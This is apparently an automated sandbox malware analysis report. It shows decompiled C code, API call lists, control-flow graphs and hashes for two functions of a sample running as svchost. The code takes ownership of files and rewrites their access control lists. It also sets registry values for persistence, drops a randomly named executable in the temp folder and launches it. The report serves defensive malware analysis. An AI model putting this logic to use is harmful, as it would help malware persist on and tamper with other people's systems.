                                                                                                                                  0x02517b70
                                                                                                                                  0x02517b72
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517b7b
                                                                                                                                  0x02517b84
                                                                                                                                  0x02517b86
                                                                                                                                  0x02517b88
                                                                                                                                  0x02517b8c
                                                                                                                                  0x02517b92
                                                                                                                                  0x02517b94
                                                                                                                                  0x02517b9c
                                                                                                                                  0x02517ba2
                                                                                                                                  0x02517ba4
                                                                                                                                  0x02517bab
                                                                                                                                  0x02517bab
                                                                                                                                  0x02517ba4
                                                                                                                                  0x02517bb2
                                                                                                                                  0x02517bb2
                                                                                                                                  0x00000000
                                                                                                                                  0x02517b88

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 02517ABA
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 02517ADF
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,0252070C,?,?,?), ref: 02517B16
                                                                                                                                  • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 02517B3B
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 02517B59
                                                                                                                                  • EqualSid.ADVAPI32(?,00000022), ref: 02517B6A
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 02517B7E
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02517B8C
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02517B9C
                                                                                                                                  • RegSetKeySecurity.KERNEL32(00000000,00000001,00000000), ref: 02517BAB
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 02517BB2
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,02517FC9,?,00000000), ref: 02517BCE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$D
                                                                                                                                  • API String ID: 2976863881-1098992889
                                                                                                                                  • Opcode ID: beb1952c70e107c28806fcd85d36d02608f995ef3827480df7896ea693ee48cc
                                                                                                                                  • Instruction ID: 7e7c1e9d5fabf6dd567b878be2c2488e3e1a8a4e2c400ca063a76c3ede799729
                                                                                                                                  • Opcode Fuzzy Hash: beb1952c70e107c28806fcd85d36d02608f995ef3827480df7896ea693ee48cc
                                                                                                                                  • Instruction Fuzzy Hash: 8EA15E71D41219AFEF218FA4CC88EFEBFB9FB49304F054469E505E2180E7359A49DB68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02517809 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 748 2517809-2517837 GetUserNameA 749 251783d-251786e LookupAccountNameA 748->749 750 2517a8e-2517a94 748->750 749->750 751 2517874-25178a2 GetLengthSid GetFileSecurityA 749->751 751->750 752 25178a8-25178c3 GetSecurityDescriptorOwner 751->752 753 25178c5-25178da EqualSid 752->753 754 251791d-251793b GetSecurityDescriptorDacl 752->754 753->754 755 25178dc-25178ed LocalAlloc 753->755 756 2517941-2517946 754->756 757 2517a8d 754->757 755->754 758 25178ef-25178f9 InitializeSecurityDescriptor 755->758 756->757 759 251794c-2517955 756->759 757->750 760 2517916-2517917 LocalFree 758->760 761 25178fb-2517909 SetSecurityDescriptorOwner 758->761 759->757 762 251795b-251796b GetAce 759->762 760->754 761->760 763 251790b-2517910 SetFileSecurityA 761->763 764 2517971-251797e 762->764 765 2517a2a 762->765 763->760 766 2517980-2517992 EqualSid 764->766 767 25179ae-25179b1 764->767 768 2517a2d-2517a37 765->768 771 2517994-2517997 766->771 772 2517999-251799b 766->772 769 25179b3-25179bd 767->769 770 25179be-25179d0 EqualSid 767->770 768->762 773 2517a3d-2517a41 768->773 769->770 775 25179d2-25179e3 770->775 776 25179e5 770->776 771->766 771->772 772->767 777 251799d-25179ac DeleteAce 772->777 773->757 774 2517a43-2517a54 LocalAlloc 773->774 774->757 778 2517a56-2517a60 InitializeSecurityDescriptor 774->778 779 25179ea-25179ed 775->779 776->779 777->768 780 2517a62-2517a71 SetSecurityDescriptorDacl 778->780 781 2517a86-2517a87 LocalFree 778->781 782 25179f8-25179fb 779->782 783 25179ef-25179f5 779->783 780->781 784 2517a73-2517a81 SetFileSecurityA 780->784 781->757 785 2517a03-2517a0e 782->785 786 25179fd-2517a01 782->786 783->782 784->781 787 2517a83 784->787 788 2517a10-2517a17 785->788 789 2517a19-2517a24 785->789 786->765 786->785 787->781 790 2517a27 788->790 789->790 790->765
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E02517809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				int _t87;
				int _t95;
				int _t100;
				struct _ACL* _t110;
				int _t116;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				_t87 = GetUserNameA( &_v384,  &_v36); // executed
				if(_t87 == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				_t95 = LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56); // executed
				if(_t95 == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				_t100 = GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44); // executed
				if(_t100 == 0) {
					goto L42;
				}
				if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
					_v36 = 0x80;
					_v40 = 0x80;
					if(EqualSid( &_v128, _v16) == 0) {
						_v28 = 1;
						_t155 = LocalAlloc(0x40, 0x14);
						if(_t155 != 0) {
							if(InitializeSecurityDescriptor(_t155, 1) != 0 && SetSecurityDescriptorOwner(_t155,  &_v128, 0) != 0) {
								SetFileSecurityA(_a4, 1, _t155); // executed
							}
							LocalFree(_t155);
						}
					}
				}
				_v24 = _t141;
				if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
					L41:
					goto L42;
				}
				_t110 = _v20;
				if(_t110 == _t141) {
					goto L41;
				}
				_v8 = _v8 & _t141;
				if(0 >= _t110->AceCount) {
					goto L41;
				} else {
					goto L13;
				}
				do {
					L13:
					if(GetAce(_t110, _v8,  &_v12) == 0) {
						L32:
						_v8 = _v8 + 1;
						goto L33;
					}
					_t153 = 0;
					_v16 = _v12 + 8;
					if(_t141 <= 0) {
						L19:
						if(_t141 < 0x20) {
							 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
							_t141 = _t141 + 1;
						}
						_t120 = EqualSid( &_v128, _v16);
						_t146 = _v12;
						if(_t120 == 0) {
							_t121 = 0x1200a8;
						} else {
							asm("sbb eax, eax");
							_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
						}
						if( *((intOrPtr*)(_t146 + 4)) != _t121) {
							 *((intOrPtr*)(_t146 + 4)) = _t121;
							_t146 = _v12;
							_v24 = 1;
						}
						if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
							 *_t146 = 0;
							_t66 = _v16 + 8; // 0xc8685f74
							_t123 =  *_t66;
							if(_t123 != 0) {
								 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
							} else {
								 *((char*)(_v12 + 1)) = 0xb;
							}
							_v24 = 1;
						}
						goto L32;
					}
					while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
						_t153 = _t153 + 1;
						if(_t153 < _t141) {
							continue;
						}
						break;
					}
					if(_t153 >= _t141) {
						goto L19;
					}
					DeleteAce(_v20, _v8);
					_v24 = 1;
					L33:
					_t110 = _v20;
				} while (_v8 < (_t110->AceCount & 0x0000ffff));
				if(_v24 != 0) {
					_v28 = 1;
					_t154 = LocalAlloc(0x40, 0x14);
					if(_t154 != 0) {
						if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0) {
							_t116 = SetFileSecurityA(_a4, 4, _t154); // executed
							if(_t116 != 0) {
								_v28 = 1;
							}
						}
						LocalFree(_t154);
					}
				}
				goto L41;
			}



































                                                                                                                                  0x0251781e
                                                                                                                                  0x02517826
                                                                                                                                  0x02517829
                                                                                                                                  0x0251782c
                                                                                                                                  0x0251782f
                                                                                                                                  0x02517837
                                                                                                                                  0x02517a8e
                                                                                                                                  0x02517a94
                                                                                                                                  0x02517a94
                                                                                                                                  0x0251785c
                                                                                                                                  0x02517863
                                                                                                                                  0x02517866
                                                                                                                                  0x0251786e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251787e
                                                                                                                                  0x0251788b
                                                                                                                                  0x0251789a
                                                                                                                                  0x025178a2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025178c3
                                                                                                                                  0x025178cc
                                                                                                                                  0x025178cf
                                                                                                                                  0x025178da
                                                                                                                                  0x025178e0
                                                                                                                                  0x025178e9
                                                                                                                                  0x025178ed
                                                                                                                                  0x025178f9
                                                                                                                                  0x02517910
                                                                                                                                  0x02517910
                                                                                                                                  0x02517917
                                                                                                                                  0x02517917
                                                                                                                                  0x025178ed
                                                                                                                                  0x025178da
                                                                                                                                  0x02517930
                                                                                                                                  0x0251793b
                                                                                                                                  0x02517a8d
                                                                                                                                  0x00000000
                                                                                                                                  0x02517a8d
                                                                                                                                  0x02517941
                                                                                                                                  0x02517946
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251794c
                                                                                                                                  0x02517955
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251795b
                                                                                                                                  0x0251795b
                                                                                                                                  0x0251796b
                                                                                                                                  0x02517a2a
                                                                                                                                  0x02517a2a
                                                                                                                                  0x00000000
                                                                                                                                  0x02517a2a
                                                                                                                                  0x02517977
                                                                                                                                  0x02517979
                                                                                                                                  0x0251797e
                                                                                                                                  0x025179ae
                                                                                                                                  0x025179b1
                                                                                                                                  0x025179b6
                                                                                                                                  0x025179bd
                                                                                                                                  0x025179bd
                                                                                                                                  0x025179c5
                                                                                                                                  0x025179cb
                                                                                                                                  0x025179d0
                                                                                                                                  0x025179e5
                                                                                                                                  0x025179d2
                                                                                                                                  0x025179d7
                                                                                                                                  0x025179de
                                                                                                                                  0x025179de
                                                                                                                                  0x025179ed
                                                                                                                                  0x025179ef
                                                                                                                                  0x025179f2
                                                                                                                                  0x025179f5
                                                                                                                                  0x025179f5
                                                                                                                                  0x025179fb
                                                                                                                                  0x02517a03
                                                                                                                                  0x02517a09
                                                                                                                                  0x02517a09
                                                                                                                                  0x02517a0e
                                                                                                                                  0x02517a24
                                                                                                                                  0x02517a10
                                                                                                                                  0x02517a13
                                                                                                                                  0x02517a13
                                                                                                                                  0x02517a27
                                                                                                                                  0x02517a27
                                                                                                                                  0x00000000
                                                                                                                                  0x025179fb
                                                                                                                                  0x02517980
                                                                                                                                  0x02517994
                                                                                                                                  0x02517997
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517997
                                                                                                                                  0x0251799b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025179a3
                                                                                                                                  0x025179a9
                                                                                                                                  0x02517a2d
                                                                                                                                  0x02517a2d
                                                                                                                                  0x02517a34
                                                                                                                                  0x02517a41
                                                                                                                                  0x02517a47
                                                                                                                                  0x02517a50
                                                                                                                                  0x02517a54
                                                                                                                                  0x02517a60
                                                                                                                                  0x02517a79
                                                                                                                                  0x02517a81
                                                                                                                                  0x02517a83
                                                                                                                                  0x02517a83
                                                                                                                                  0x02517a81
                                                                                                                                  0x02517a87
                                                                                                                                  0x02517a87
                                                                                                                                  0x02517a54
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 0251782F
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02517866
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 02517878
                                                                                                                                  • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0251789A
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,02517F63,?), ref: 025178B8
                                                                                                                                  • EqualSid.ADVAPI32(?,02517F63), ref: 025178D2
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 025178E3
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 025178F1
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02517901
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02517910
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 02517917
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02517933
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 02517963
                                                                                                                                  • EqualSid.ADVAPI32(?,02517F63), ref: 0251798A
                                                                                                                                  • DeleteAce.ADVAPI32(?,00000000), ref: 025179A3
                                                                                                                                  • EqualSid.ADVAPI32(?,02517F63), ref: 025179C5
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 02517A4A
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02517A58
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02517A69
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02517A79
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 02517A87
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 3722657555-2746444292
                                                                                                                                  • Opcode ID: 0e24216b5f0f4a4f08eef9009f3354cc1bb8029cdad2448f26e489b7435071f6
                                                                                                                                  • Instruction ID: 25f01e1d43dcd71ab31b30ee91f1ef54238bf2aae154a9cd82edba51b1360614
                                                                                                                                  • Opcode Fuzzy Hash: 0e24216b5f0f4a4f08eef9009f3354cc1bb8029cdad2448f26e489b7435071f6
                                                                                                                                  • Instruction Fuzzy Hash: 54815B71D0121AABEB21CFA8CD44FEEBBB8BF0D345F15446AE505E2180D7348649DFA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02518328 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 791 2518328-251833e call 2517dd6 794 2518340-2518343 791->794 795 2518348-2518356 call 2516ec3 791->795 796 251877b-251877d 794->796 799 251846b-2518474 795->799 800 251835c-2518378 call 25173ff 795->800 801 25185c2-25185ce 799->801 802 251847a-2518480 799->802 812 2518464-2518466 800->812 813 251837e-2518384 800->813 804 25185d0-25185da call 251675c 801->804 805 2518615-2518620 801->805 802->801 806 2518486-25184ba call 2512544 RegOpenKeyExA 802->806 815 25185df-25185eb 804->815 810 25186a7-25186b0 call 2516ba7 805->810 811 2518626-251864c GetTempPathA call 2518274 call 251eca5 805->811 821 25184c0-25184db RegQueryValueExA 806->821 822 2518543-2518571 call 2512544 RegOpenKeyExA 806->822 830 2518762 810->830 831 25186b6-25186bd call 2517e2f 810->831 852 2518671-25186a4 call 2512544 call 251ef00 call 251ee2a 811->852 853 251864e-251866f call 251eca5 811->853 814 2518779-251877a 812->814 813->812 819 251838a-251838d 813->819 814->796 815->805 820 25185ed-25185ef 815->820 819->812 825 2518393-2518399 819->825 820->805 826 25185f1-25185fa 820->826 828 2518521-251852d RegCloseKey 821->828 829 25184dd-25184e1 821->829 846 2518573-251857b 822->846 847 25185a5-25185b7 call 251ee2a 822->847 833 251839c-25183a1 825->833 826->805 836 25185fc-251860f call 25124c2 826->836 828->822 834 251852f-2518541 call 251eed1 828->834 829->828 838 25184e3-25184e6 829->838 840 2518768-251876b 830->840 862 25186c3-251873b call 251ee2a * 2 lstrcpyA lstrlenA call 2517fcf CreateProcessA 831->862 863 251875b-251875c DeleteFileA 831->863 833->833 835 25183a3-25183af 833->835 834->822 834->847 843 25183b1 835->843 844 25183b3-25183ba 835->844 836->805 836->840 838->828 848 25184e8-25184f6 call 251ebcc 838->848 850 2518776-2518778 840->850 851 251876d-2518775 call 251ec2e 840->851 843->844 856 2518450-251845f call 251ee2a 844->856 857 25183c0-25183fb call 2512544 RegOpenKeyExA 844->857 859 251857e-2518583 846->859 847->801 879 25185b9-25185c1 call 251ec2e 847->879 848->828 878 25184f8-2518513 RegQueryValueExA 848->878 850->814 851->850 852->810 853->852 856->801 857->856 883 25183fd-251841c RegQueryValueExA 857->883 859->859 870 2518585-251859f RegSetValueExA RegCloseKey 859->870 899 251873d-251874d CloseHandle * 2 862->899 900 251874f-251875a call 2517ee6 call 2517ead 862->900 863->830 870->847 878->828 884 2518515-251851e call 251ec2e 878->884 879->801 888 251842d-2518441 RegSetValueExA 883->888 889 251841e-2518421 883->889 884->828 895 2518447-251844a RegCloseKey 888->895 889->888 894 2518423-2518426 889->894 894->888 898 2518428-251842b 894->898 895->856 898->888 898->895 899->840 900->863
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E02518328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E02517DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E02516EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x2522c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x2522c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E02512544(0x25222f8,  &E025206AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E02512544(0x25222f8,  &E025206AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0251EE2A(_t173, 0x25222f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0251EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x2522c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x2522c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x2522c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0251EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x2522c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0251EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0251EED1(_v8,  *0x2522c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E025173FF(_t173, 0x2520264, 0, 0,  &_v388,  &_v60); // executed
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x2522159 - 0x60;
						if( *0x2522159 < 0x60) {
							L18:
							E0251EE2A(_t180, 0x25222f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
							if(__eflags == 0) {
								L42:
								__eflags =  *0x2522cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E02516BA7(0x2522cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x2522cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0251EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E02517E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x2522cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0251EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0251EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x2522cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E02517FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E02517EE6(_t174);
										E02517EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x2522cd8);
								_t113 = E02518274(0x2522cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0251ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E02512544(0x25222f8, 0x2520694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x2522cd8; // 0x0
									E0251EF00(_t69, _t117);
									E0251EE2A(_t177, 0x25222f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0251ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x2522cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0251675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v20, 0); // executed
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x25221a4; // 0x47a00
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E025124C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x25222d4 - _t128; // 0x92c105df
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E02512544(0x25222f8,  &E02520710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12); // executed
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16); // executed
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189); // executed
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}





















































                                                                                                                                  0x02518328
                                                                                                                                  0x02518328
                                                                                                                                  0x02518334
                                                                                                                                  0x0251833e
                                                                                                                                  0x00000000
                                                                                                                                  0x02518342
                                                                                                                                  0x0251834a
                                                                                                                                  0x02518354
                                                                                                                                  0x02518356
                                                                                                                                  0x0251846b
                                                                                                                                  0x0251846e
                                                                                                                                  0x02518474
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251847a
                                                                                                                                  0x02518480
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025184a2
                                                                                                                                  0x025184ad
                                                                                                                                  0x025184b6
                                                                                                                                  0x025184b8
                                                                                                                                  0x025184ba
                                                                                                                                  0x02518543
                                                                                                                                  0x0251855f
                                                                                                                                  0x02518564
                                                                                                                                  0x0251856d
                                                                                                                                  0x0251856f
                                                                                                                                  0x02518571
                                                                                                                                  0x025185a5
                                                                                                                                  0x025185ac
                                                                                                                                  0x025185b1
                                                                                                                                  0x025185b4
                                                                                                                                  0x025185b7
                                                                                                                                  0x025185bc
                                                                                                                                  0x025185c1
                                                                                                                                  0x00000000
                                                                                                                                  0x025185b7
                                                                                                                                  0x02518573
                                                                                                                                  0x02518579
                                                                                                                                  0x0251857b
                                                                                                                                  0x0251857b
                                                                                                                                  0x0251857e
                                                                                                                                  0x0251857e
                                                                                                                                  0x02518580
                                                                                                                                  0x02518581
                                                                                                                                  0x02518581
                                                                                                                                  0x02518587
                                                                                                                                  0x02518587
                                                                                                                                  0x02518596
                                                                                                                                  0x0251859f
                                                                                                                                  0x00000000
                                                                                                                                  0x0251859f
                                                                                                                                  0x025184d3
                                                                                                                                  0x025184d9
                                                                                                                                  0x025184db
                                                                                                                                  0x025184dd
                                                                                                                                  0x025184e1
                                                                                                                                  0x025184e3
                                                                                                                                  0x025184e6
                                                                                                                                  0x025184eb
                                                                                                                                  0x025184f0
                                                                                                                                  0x025184f1
                                                                                                                                  0x025184f4
                                                                                                                                  0x025184f6
                                                                                                                                  0x025184f8
                                                                                                                                  0x0251850b
                                                                                                                                  0x02518511
                                                                                                                                  0x02518513
                                                                                                                                  0x02518518
                                                                                                                                  0x0251851d
                                                                                                                                  0x0251851e
                                                                                                                                  0x0251851e
                                                                                                                                  0x02518513
                                                                                                                                  0x025184f6
                                                                                                                                  0x025184e6
                                                                                                                                  0x025184e1
                                                                                                                                  0x02518524
                                                                                                                                  0x0251852a
                                                                                                                                  0x0251852d
